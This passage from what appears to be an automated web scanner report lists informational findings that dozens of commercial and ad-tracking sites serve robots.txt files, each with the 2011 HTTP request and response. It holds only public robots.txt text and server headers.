Vary: Accept-Encoding
X-Request-Time: D=185 t=1315321022378162
X-Served-By: logger-b007.krxd.net
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

26.90. https://shop.oracle.com/store/Database

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.oracle.com
Path:   /store/Database

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: shop.oracle.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:15:19 GMT
Server: Oracle-Application-Server-10g
Last-Modified: Thu, 04 Mar 2010 14:26:16 GMT
ETag: "17bd8d8-b5-4b8fc308"
Accept-Ranges: bytes
Content-Length: 181
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

#
# To avoid getting errors of bots searching the store, creating a robots.txt file
#
User-agent: * # match all bots
Disallow: /i/ # Don't allow bots to search the images directory

26.91. http://speed.pointroll.com/PointRoll/Media/Banners/Lego/893716/superbrick_300x250_flash_r01.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /PointRoll/Media/Banners/Lego/893716/superbrick_300x250_flash_r01.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Thu, 15 Sep 2005 12:53:14 GMT
Accept-Ranges: bytes
ETag: "394b626ff4b9c51:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:57:11 GMT
Connection: close

User-agent: *
Disallow: /

26.92. http://stats.deloitte.com/b/ss/deloittecomnewplatformprod/1/H.22.1/s09288867821451

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.deloitte.com
Path:   /b/ss/deloittecomnewplatformprod/1/H.22.1/s09288867821451

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: stats.deloitte.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:02 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "1c01ce-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www391
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.93. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/677/cnbc/300x250/atf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Last-Modified: Wed, 31 Aug 2011 21:42:54 GMT
ETag: "81a0179-1a-4abd402b9f380"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Tue, 06 Sep 2011 14:57:04 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

User-agent: *
Disallow: /

26.94. http://tf.nexac.com/media/1809966/na.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tf.nexac.com
Path:   /media/1809966/na.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tf.nexac.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

26.95. http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thinkwrap.com
Path:   /ourfocus/atg-ecommerce-solutions-partner/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: thinkwrap.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 15:32:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
X-Pingback: http://thinkwrap.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 70
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://thinkwrap.com/sitemap.xml.gz

26.96. http://twitter.com/statuses/user_timeline/CenturyLinkBiz.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /statuses/user_timeline/CenturyLinkBiz.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:47 GMT
Server: Apache
Last-Modified: Mon, 29 Aug 2011 17:35:23 GMT
Accept-Ranges: bytes
Content-Length: 519
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:32:47 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/plain; charset=UTF-8

#Google Search Engine Robot
User-agent: Googlebot
# Crawl-delay: 10 -- Googlebot ignores crawl-delay ftl
Allow: /*?*_escaped_fragment_
Disallow: /*?
Disallow: /*/with_friends

#Yahoo! Search Engine Ro
...[SNIP]...

26.97. http://wingateweb.112.2o7.net/b/ss/winweboracle/1/H.20.3/s05398456470575

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wingateweb.112.2o7.net
Path:   /b/ss/winweboracle/1/H.20.3/s05398456470575

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wingateweb.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:56:53 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "19d148-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www176
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.98. http://wt.infosys.com/dcsompe1g7xywz12f97ensgi0_4h9t/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wt.infosys.com
Path:   /dcsompe1g7xywz12f97ensgi0_4h9t/dcs.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wt.infosys.com

Response

HTTP/1.1 200 OK
Content-Length: 277
Content-Type: text/plain
Last-Modified: Mon, 01 Aug 2011 07:57:59 GMT
Accept-Ranges: bytes
ETag: "d6fe4ebb2050cc1:baa"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:36:28 GMT
Connection: close

##############################
#
# WebTrends SmartSource Data Collector
# Copyright (c) 1996-2007 WebTrends Inc. All rights reserved.
# $DateTime: 2007/02/02 09:50:38 $
#
######################
...[SNIP]...

26.99. http://www.actonsoftware.com/acton/bn/1227/visitor.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.actonsoftware.com
Path:   /acton/bn/1227/visitor.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.actonsoftware.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"65-1314468226000"
Last-Modified: Sat, 27 Aug 2011 18:03:46 GMT
Content-Type: text/plain
Content-Length: 65
Date: Tue, 06 Sep 2011 15:32:49 GMT
Connection: close

User-agent: *
Disallow: /acton/
Disallow: /company_board.html

26.100. http://www.apture.com/js/apture.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apture.com
Path:   /js/apture.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apture.com

Response

HTTP/1.0 200 OK
Last-Modified: Sat, 03 Sep 2011 01:16:29 GMT
Content-Length: 197
Content-Type: text/plain
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Date: Tue, 06 Sep 2011 15:33:01 GMT

User-agent: *
Disallow: /media/
Disallow: /builderSecret/
Disallow: /createSecret/
Disallow: /pluginSecret/
Disallow: /incrMagicLinkCount/
Disallow: /magiclinks/
Disallow: /createbar/checkscript/

26.101. http://www.atg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atg.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.atg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 13 Oct 2010 16:59:21 GMT
ETag: "61212-31c-4928283c56c40"
Content-Type: text/plain; charset=UTF-8
Cache-Control: proxy-revalidate, max-age=7200
Expires: Tue, 06 Sep 2011 17:32:22 GMT
Date: Tue, 06 Sep 2011 15:32:22 GMT
Content-Length: 796
Connection: close

User-agent: *
Disallow: /repositories/ContentCatalogRepository_en/manuals
Disallow: /en/login
Disallow: /atg/internal
Disallow: /atg/monitor
Disallow: /myatg
Disallow: /esupport
Disallow: /portal
Disa
...[SNIP]...

26.102. https://www.atg.com/service/main.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.atg.com
Path:   /service/main.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.atg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 13 Oct 2010 16:59:21 GMT
ETag: "61212-31c-4928283c56c40"
Content-Type: text/plain; charset=UTF-8
Cache-Control: proxy-revalidate, max-age=7200
Expires: Tue, 06 Sep 2011 17:37:33 GMT
Date: Tue, 06 Sep 2011 15:37:33 GMT
Content-Length: 796
Connection: close

User-agent: *
Disallow: /repositories/ContentCatalogRepository_en/manuals
Disallow: /en/login
Disallow: /atg/internal
Disallow: /atg/monitor
Disallow: /myatg
Disallow: /esupport
Disallow: /portal
Disa
...[SNIP]...

26.103. http://www.beautyproductsdirect.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beautyproductsdirect.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beautyproductsdirect.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:24 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d
Last-Modified: Thu, 07 Apr 2011 09:58:21 GMT
ETag: "29a4803-75-4d9d8abd"
Accept-Ranges: bytes
Content-Length: 117
Connection: close
Content-Type: text/plain

# Robots.txt for BPD

User-agent: *
Disallow: /bpddev/
Disallow: /inc/
Disallow: /control_cube/
Disallow: /invoice/


26.104. http://www.bigcommerce.com/lp/e1-lp-ecommerce.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigcommerce.com
Path:   /lp/e1-lp-ecommerce.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bigcommerce.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:13 GMT
Server: Apache
Last-Modified: Mon, 01 Mar 2010 02:17:27 GMT
ETag: "59-480b3d9b71bc0"
Accept-Ranges: bytes
Content-Length: 89
Cache-Control: max-age=432000
Expires: Sun, 11 Sep 2011 15:32:13 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent:*
Sitemap: http://www.bigcommerce.com/sitemap.xml
Disallow: /partners/seal.php

26.105. https://www.bigcommerce.com/pci-compliant-shopping-cart-software.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bigcommerce.com
Path:   /pci-compliant-shopping-cart-software.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bigcommerce.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:38:26 GMT
Server: Apache
Last-Modified: Mon, 01 Mar 2010 02:17:27 GMT
ETag: "59-480b3d9b71bc0"
Accept-Ranges: bytes
Content-Length: 89
Cache-Control: max-age=432000
Expires: Sun, 11 Sep 2011 15:38:26 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent:*
Sitemap: http://www.bigcommerce.com/sitemap.xml
Disallow: /partners/seal.php

26.106. http://www.bizographics.com/collect/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bizographics.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:33:02 GMT
Server: nginx/0.7.61
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

26.107. http://www.cnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:56:33 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/plain
Via: 1.1 aicache6, 1.1 C aicache6
X-Aicache-OS: 64.210.194.245:80
Keep-Alive: max=20
Content-Length: 121
X-Aicache-OS: 64.210.193.221:80
Connection: close
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:56:34 GMT

# robots.txt file for www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.cnbc.com/sitemap_news.xml

26.108. http://www.csc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csc.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.csc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:43 GMT
Server: Apache
Last-Modified: Fri, 19 Feb 2010 16:14:54 GMT
Accept-Ranges: bytes
Content-Length: 80
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:57:43 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

Sitemap: http://www.csc.com/sitemap.xml.gz

User-agent: gsa-crawler
Disallow: /

26.109. http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cvs.com
Path:   /CVSApp/promoContent/promoLandingTemplate.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cvs.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:42 GMT
Server: Apache
Last-Modified: Mon, 06 Dec 2010 21:25:52 GMT
Accept-Ranges: bytes
Content-Length: 28
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:45:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: 008
Disallow: /

26.110. https://www.cvs.com/CVSApp/checkout/rx/rx_new_container.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cvs.com
Path:   /CVSApp/checkout/rx/rx_new_container.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cvs.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:47:30 GMT
Server: Apache
Last-Modified: Mon, 06 Dec 2010 21:25:52 GMT
Accept-Ranges: bytes
Content-Length: 28
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:47:30 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: 008
Disallow: /

26.111. http://www.deloitte.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deloitte.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.deloitte.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 09 Jul 2011 08:33:43 GMT
Accept-Ranges: bytes
ETag: "704778e9123ecc1:e97"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 533
Date: Tue, 06 Sep 2011 15:56:57 GMT
Connection: close

User-agent: *
Disallow: /dtt/
Disallow: /assets/secure/
Disallow: /print/
Disallow: /rss/

User-agent: ia_archiver
Disallow: /

User-agent: ConveraCrawler
Disallow: /

User-agent: Autonom
...[SNIP]...

26.112. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.64.119.47
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

26.113. http://www.fetchback.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fetchback.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:47:42 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 24 Aug 2011 14:57:15 GMT
Accept-Ranges: bytes
Content-Length: 206
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 15:47:42 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007.
## Updated: November 16th 2007.
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Disallow: /adodb495a
Disallow: /adodb5
Disallow: /a
...[SNIP]...

26.114. http://www.google-analytics.com/__utm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Tue, 06 Sep 2011 15:27:53 GMT
Expires: Tue, 06 Sep 2011 15:27:53 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

26.115. http://www.googleadservices.com/pagead/aclk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Tue, 06 Sep 2011 05:52:07 GMT
Date: Tue, 06 Sep 2011 15:31:59 GMT
Expires: Tue, 06 Sep 2011 15:31:59 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.116. http://www.harbottle.com/hnl/pages/hnl.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.harbottle.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:43:19 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 22 Oct 2008 10:12:08 GMT
ETag: "46988a-8a-c7de0e00"
Accept-Ranges: bytes
Content-Length: 138
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /hnl/preview/
Disallow: /hnl/intranet/
Disallow: /hnl/private/
Disallow: /hint/
Disallow: /genie/
Allow: /

26.117. http://www.imiclk.com/cgi/r.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imiclk.com
Path:   /cgi/r.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imiclk.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (CentOS)
Last-Modified: Tue, 22 Mar 2011 15:09:46 GMT
ETag: "65c069-1a-49f13a27ae280"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Sep 2011 16:45:45 GMT
Connection: close

User-agent: *
Disallow: /

26.118. http://www.linkedin.com/countserv/count/share

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkedin.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1162225322"
Last-Modified: Wed, 06 Apr 2011 03:23:47 GMT
Content-Length: 24473
Connection: keep-alive
Date: Tue, 06 Sep 2011 15:33:09 GMT
Server: lighttpd

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...

26.119. http://www.marykay.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marykay.com

Response

HTTP/1.1 200 OK
Content-Length: 696
Content-Type: text/plain
Last-Modified: Wed, 22 Jun 2011 21:19:13 GMT
Accept-Ranges: bytes
ETag: "d0dcab82231cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=43DEB525412A5F56EAEE74A990E2EC2A; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Connection: close
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

# /robots.txt file for http://www.marykay.com/

User-agent: *
Disallow: /AddToBagRedirect.aspx
Disallow: /Customer404.aspx
Disallow: /CustomError.aspx
Disallow: /Gate.aspx
Disallow: /InTouchRed
...[SNIP]...

26.120. http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netsuite.com
Path:   /portal/seo-landing-page/ecommerce/ecommerce-2.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.netsuite.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 260
Content-Disposition: inline;filename*=utf-8''robots.txt
NS_RTIMER_COMPOSITE: -803733239:73686F702D6A6176613030312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=2056
Date: Tue, 06 Sep 2011 15:32:22 GMT
Connection: close

# These intructions apply to all robots.

User-Agent: *
Disallow: /portal/pdf/tos.pdf
Disallow: /portal/resource/terms_of_service.shtml

#Crawl-Delay: 10


sitemap: http://www.netsuite.com.au/sitema
...[SNIP]...

26.121. http://www.oracle.com/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oracle.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
SS_FRIENDLY_EXT: txt
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (M;max-age=300+0;age=0;ecid=41025994034543250,0:1)
Date: Tue, 06 Sep 2011 15:53:59 GMT
Content-Length: 20509
Connection: close

# /robots.txt for www.oracle.com
User-agent: *
Sitemap: http://www.oracle.com/oracle-sitemap.xml
Sitemap: http://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/071488.xml
Disallow: /a
...[SNIP]...

26.122. http://www.readwriteweb.com/enterprise/2010/11/oracle.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.readwriteweb.com
Path:   /enterprise/2010/11/oracle.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.readwriteweb.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:44 GMT
Server: Apache/2.x (Hardened)
Last-Modified: Wed, 07 Jul 2010 16:50:17 GMT
ETag: "207-48acef6e5e440"
Accept-Ranges: bytes
Content-Length: 519
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# robots.txt for http://www.readwriteweb.com/

User-agent: *
Disallow: /test/
Disallow: /new/
Disallow: /42/
Disallow: /cgi-bin/

User-agent: Googlebot-Image
Disallow: /

User-agent: 008
Disallow: /

...[SNIP]...

26.123. http://www.sapient.com/en-us/about-sapient/alliances/atg.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapient.com
Path:   /en-us/about-sapient/alliances/atg.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sapient.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 125
Content-Type: text/plain
Last-Modified: Mon, 11 Oct 2010 06:10:07 GMT
Accept-Ranges: bytes
ETag: "89d3d6f3a69cb1:27f4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:32 GMT
Connection: close

User-agent: *
Disallow: /admin
Disallow: /awards

# Sitemap Auto-Discovery
Sitemap: http://www.sapient.com/sitemap.xml

26.124. http://www.shopify.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopify.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shopify.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Content-Type: text/plain
Last-Modified: Thu, 06 Jan 2011 22:15:23 GMT
Vary: Accept-Encoding
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 189
Date: Tue, 06 Sep 2011 15:32:10 GMT
X-Varnish: 1687907071
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /paypal-shopify/
Disallow: /paypal/
Disallow: /behance/draft1/


26.125. http://www.sophelle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sophelle.com

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: text/plain
Last-Modified: Mon, 26 Oct 2009 18:49:57 GMT
Accept-Ranges: bytes
ETag: "d3bc1a1d6d56ca1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:25:59 GMT
Connection: close

User-agent:*
Allow:/
Sitemap: http://www.Sophelle.com/Sitemap.xml

26.126. http://www.tenzing.com/atg-ecommerce-hosting.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenzing.com
Path:   /atg-ecommerce-hosting.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tenzing.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 375
Content-Type: text/plain
Last-Modified: Wed, 01 Jun 2011 10:49:24 GMT
Accept-Ranges: bytes
ETag: "a24687924920cc1:17bb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:06 GMT
Connection: close

User-agent: *
Disallow: /everest-cloud.asp
Disallow: /atg/
Disallow: /cloud/
Disallow: /forms/
Disallow: /saas/
Disallow: /tenzing/
Disallow: /training/
Disallow: /webinar/
Disallow: /whitepa
...[SNIP]...

26.127. http://www.volusion.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.volusion.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.volusion.com

Response

HTTP/1.1 200 OK
Content-Length: 423
Content-Type: text/plain
Last-Modified: Tue, 30 Aug 2011 19:28:40 GMT
Accept-Ranges: bytes
ETag: "ac6f9954b67cc1:1612"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR ADM TAIo PSA PSD IVA CONi TELo OUR DEL SAM OTR LEG UNI"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:01 GMT
Connection: close

# robots.txt for search engines

User-agent:*
Sitemap: http://www.volusion.com/sitemap.xml
Disallow: /announcements/2009_10_21.asp
Disallow: /announcements/2011/
Disallow: /test/
Disallow: /tem
...[SNIP]...

26.128. http://www.youtube.com/v/JWMKXb1Guq4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /v/JWMKXb1Guq4

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 15:34:00 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 18:22:34 GMT
ETag: "21b-4abe5541eae80"
Accept-Ranges: bytes
Content-Length: 539
Vary: Accept-Encoding
Content-Type: text/plain

# robots.txt file for YouTube
# Created in the distant future (the year 2000) after
# the robotic uprising of the mid 90's which wiped out all humans.

User-agent: Mediapartners-Google*
Disallow:

Use
...[SNIP]...

26.129. http://www.znode.com/znode-multifront/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.znode.com
Path:   /znode-multifront/default.aspx

Issue detail

The web server contains a robots.txt file.

Request

